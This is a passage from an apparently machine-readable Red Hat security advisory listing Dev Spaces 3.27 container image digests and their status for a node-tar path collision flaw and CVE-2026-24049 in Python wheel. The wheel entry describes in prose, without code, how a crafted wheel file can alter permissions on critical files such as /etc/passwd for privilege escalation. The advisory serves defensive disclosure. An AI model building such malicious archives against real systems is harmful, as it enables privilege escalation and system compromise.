"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition"
},
{
"cve": "CVE-2026-24049",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-01-22T05:00:54.709179+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431959"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw has been discovered in the python wheel too. The unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "wheel: wheel: Privilege Escalation or Arbitrary Code Execution via malicious wheel file unpacking",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
